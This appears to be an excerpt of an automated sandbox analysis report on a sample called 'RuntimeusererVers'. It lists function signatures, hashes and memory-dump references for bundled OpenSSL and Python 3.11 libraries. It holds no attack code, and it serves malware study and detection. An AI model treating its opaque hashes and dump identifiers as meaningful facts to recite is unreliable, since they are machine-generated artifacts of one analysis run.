                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$ClearExceptionFormatMatchesUnicode_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3412208678-0
                                                                                                                                                                                                                                          • Opcode ID: b232e96879157e562793b78d46a75f0cb5b4b655f96e12909a82b8d3dd152ccb
                                                                                                                                                                                                                                          • Instruction ID: a2268e64b35727deafdfd753da12b9bbbf8bcbfdc19ead42ad71674239b87a64
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b232e96879157e562793b78d46a75f0cb5b4b655f96e12909a82b8d3dd152ccb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DDF01825B08F8192EA58CB56FC541A56360FF88FD0B144235DD5D97B25DF2DF490C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: X_free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2268491255-0
                                                                                                                                                                                                                                          • Opcode ID: 0501fa589575d6f3eaf730ced008f5909f2c3022fc05dda30cca060b699d4e5a
                                                                                                                                                                                                                                          • Instruction ID: c5cdd485a3e0714a802b3d544c9a2718485b541a5d83fb6b80649bc5b8edc751
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0501fa589575d6f3eaf730ced008f5909f2c3022fc05dda30cca060b699d4e5a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71F04972605E8540EF50AF6194506B86394FFD4BD4F180235FF4D4B696DE28E4918325
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: P_get_type$J_nid2snL_get_current_compression
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 142675065-0
                                                                                                                                                                                                                                          • Opcode ID: c11d12d9b588753e960aefc8cbe93c452380898eed916eeb5e2f40342b3b5b4f
                                                                                                                                                                                                                                          • Instruction ID: bcd1bed872bb03922ddfafcd77388c412fdf1f7d940c4f4d9974fba5625d8a76
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c11d12d9b588753e960aefc8cbe93c452380898eed916eeb5e2f40342b3b5b4f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8BF0D410B0AE0A81FF198B6AA89463452A0AF88FB6B480638CD1E07390DE2CF8D5C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_OccurredR_clear_errorR_peek_last_errorS_mode
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 744735716-0
                                                                                                                                                                                                                                          • Opcode ID: 27e5880cbae6fc9e5cdb7477b5843f02d60fd755207fe5d62d99d16496de8ff4
                                                                                                                                                                                                                                          • Instruction ID: 2febe8d02ae1231a49e740f024112dfc3406314348f1a875b6f0aab2107fd351
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27e5880cbae6fc9e5cdb7477b5843f02d60fd755207fe5d62d99d16496de8ff4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9F09851F08E4381FB959B75A8589392391AF48FF4B184735C92E862E0EF2CB8F58351
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocErr_MemoryObject_X_new
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 30467670-0
                                                                                                                                                                                                                                          • Opcode ID: ff40f30a92d5eed2e742e76349bf853d5a257016a328a92baeabcb4a8d59bfb5
                                                                                                                                                                                                                                          • Instruction ID: 220964e863377573b1fe41de886ffd7e8b79d50c7daeed4ddcf8e8294eca7ac8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff40f30a92d5eed2e742e76349bf853d5a257016a328a92baeabcb4a8d59bfb5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97F0C921E19F0785FB699B61B808B3822A5AF19BB1F081634C90E05390EF7CB8F49390
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeObject_Thread_free_lockX_free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3834077558-0
                                                                                                                                                                                                                                          • Opcode ID: cf6fcc43b87a8b4a2fc809b38a5bc1d7108a0602b2732fd26c72954d6dda49d8
                                                                                                                                                                                                                                          • Instruction ID: fac4aef39111a317c7dca11d9eb424fec9e6e392228ecf71d03693cf32dfacc7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf6fcc43b87a8b4a2fc809b38a5bc1d7108a0602b2732fd26c72954d6dda49d8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00F0F822A08E4385EA588B66F59883D2320EB49FF5B185230DA0E06660CF2CF8F5C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocFreeObject_Thread_free_lockX_free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 133976240-0
                                                                                                                                                                                                                                          • Opcode ID: 57730f3bc79dfce44f660b9b0e6df719bd62e154393204126429c72edc4f63f9
                                                                                                                                                                                                                                          • Instruction ID: a23c6de626a47e36e1a9661d563032f98d29a9443c21c33dcc7154990a169cee
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57730f3bc79dfce44f660b9b0e6df719bd62e154393204126429c72edc4f63f9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55E0AC35A19E4381EA54DB65E5584386320EF48FF5B185230DE1E06614DE2CE8E58340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140 ref: 00007FF81E0D28D7
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081267: EVP_CIPHER_CTX_cipher.LIBCRYPTO-1_1 ref: 00007FF81E0D1496
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081267: EVP_CIPHER_flags.LIBCRYPTO-1_1 ref: 00007FF81E0D149E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081267: EVP_MD_CTX_md.LIBCRYPTO-1_1 ref: 00007FF81E0D14B0
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081267: EVP_MD_size.LIBCRYPTO-1_1 ref: 00007FF81E0D14B8
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081267: EVP_CIPHER_CTX_cipher.LIBCRYPTO-1_1 ref: 00007FF81E0D14D1
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081267: EVP_CIPHER_flags.LIBCRYPTO-1_1 ref: 00007FF81E0D14D9
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081267: EVP_CIPHER_CTX_block_size.LIBCRYPTO-1_1 ref: 00007FF81E0D14EF
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081267: BIO_ctrl.LIBCRYPTO-1_1 ref: 00007FF81E0D156D
                                                                                                                                                                                                                                          • BIO_ctrl.LIBCRYPTO-1_1 ref: 00007FF81E0D2A07
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_ctrlR_flagsX_cipher$D_sizeX_block_sizeX_mdmemcpy
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_dtls.c
                                                                                                                                                                                                                                          • API String ID: 1483294773-3140652063
                                                                                                                                                                                                                                          • Opcode ID: 204412abf80564a97c1fafa206ce13a068008e0f88b764c6312e434c6826633e
                                                                                                                                                                                                                                          • Instruction ID: fdfec295c349d463ccb146a01a2099b281e10b499fa8bee8819671cc337310fe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 204412abf80564a97c1fafa206ce13a068008e0f88b764c6312e434c6826633e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53618A32605F8492EB94DB16E584BAE77A8FB88BA0F114236EF9C43755DF38E460C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_ctrl
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\d1_lib.c
                                                                                                                                                                                                                                          • API String ID: 3605655398-490761327
                                                                                                                                                                                                                                          • Opcode ID: 4fb5c8f4a442cd5c47344fcfb48cd2715ef5b855b47c975e52132fa561e49fef
                                                                                                                                                                                                                                          • Instruction ID: 384a82f8809aca4ab99337821b34382b9ce9dd69d9726897d5124b29b6221526
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fb5c8f4a442cd5c47344fcfb48cd2715ef5b855b47c975e52132fa561e49fef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05517E32E04B8686DB58CB15E644BFD77E1FB85BE8F554232DA2D077A1CF38A0618B40
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_cleansememcpy
                                                                                                                                                                                                                                          • String ID: traffic upd
                                                                                                                                                                                                                                          • API String ID: 2817969487-79366657
                                                                                                                                                                                                                                          • Opcode ID: f8617069f4cd0e815da06fd2992a78c95339bda7289e02c4423e570d17b17890
                                                                                                                                                                                                                                          • Instruction ID: 22798f03554c084e0fda8920e8a20182afe5c8b816d5600565353a1ee4e1bd09
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8617069f4cd0e815da06fd2992a78c95339bda7289e02c4423e570d17b17890
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE316E22A08F8586EA24AB12E4407AAB7A4FB85BE4F400235EF8D47796DF3CF555C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Formatmemset
                                                                                                                                                                                                                                          • String ID: %s%s
                                                                                                                                                                                                                                          • API String ID: 1100529188-3252725368
                                                                                                                                                                                                                                          • Opcode ID: 9297e27a36079c61f600f629d6b8c395e201d79af011432404e753dcc092db21
                                                                                                                                                                                                                                          • Instruction ID: c4b40bb4c5905063590988eb05a8264418a7a10c609698d0b6e51bb2e6fbdbb9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9297e27a36079c61f600f629d6b8c395e201d79af011432404e753dcc092db21
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3317222A08B8689D714CF25D8602E837A1FB49BF8F485331DA6E477D9DF79E155C340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Time$System$File
                                                                                                                                                                                                                                          • String ID: gfff
                                                                                                                                                                                                                                          • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                          • Opcode ID: 5bab4889fdff038a34dd7d6efd02d934e11c3433e8613633f5b88581a3d60216
                                                                                                                                                                                                                                          • Instruction ID: edf244eb8ebef4f1174fad310597f8dbe674240c754af2162f37f2162b2fe21b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bab4889fdff038a34dd7d6efd02d934e11c3433e8613633f5b88581a3d60216
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2221A5B2A04A8786EF548F29E91077977E0FB98BE8F458135DA4DC7754EE3CE5508700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: D_bytes_time64
                                                                                                                                                                                                                                          • String ID: DOWNGRD
                                                                                                                                                                                                                                          • API String ID: 3543108242-2922851170
                                                                                                                                                                                                                                          • Opcode ID: badda77ca74e05cbb1b9a1913239d2957b81495fa8a0d3fb60bfa0f44542addb
                                                                                                                                                                                                                                          • Instruction ID: fb75a49f9b15395f0f7f475888e9d732969286c85f065812f264e7c5be0a8d08
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: badda77ca74e05cbb1b9a1913239d2957b81495fa8a0d3fb60bfa0f44542addb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A219632B18A42C7EF5C8B29A95247DA292FB94790F544238DB0F87791DE28F9A1C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • PyObject_IsTrue.PYTHON311 ref: 00007FF81E4E33CB
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: PyModule_GetState.PYTHON311 ref: 00007FF81E4E1063
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: _Py_hashtable_get.PYTHON311 ref: 00007FF81E4E1073
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: EVP_MD_flags.LIBCRYPTO-1_1 ref: 00007FF81E4E10A7
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: PyModule_GetState.PYTHON311 ref: 00007FF81E4E10B8
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: _PyObject_New.PYTHON311 ref: 00007FF81E4E10C1
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: EVP_MD_CTX_new.LIBCRYPTO-1_1 ref: 00007FF81E4E10D3
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E4E1000: EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 00007FF81E4E10FB
                                                                                                                                                                                                                                          • _PyArg_UnpackKeywords.PYTHON311 ref: 00007FF81E4E341B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Module_Object_State$Arg_D_flagsDigestInit_exKeywordsPy_hashtable_getTrueUnpackX_new
                                                                                                                                                                                                                                          • String ID: sha3_224
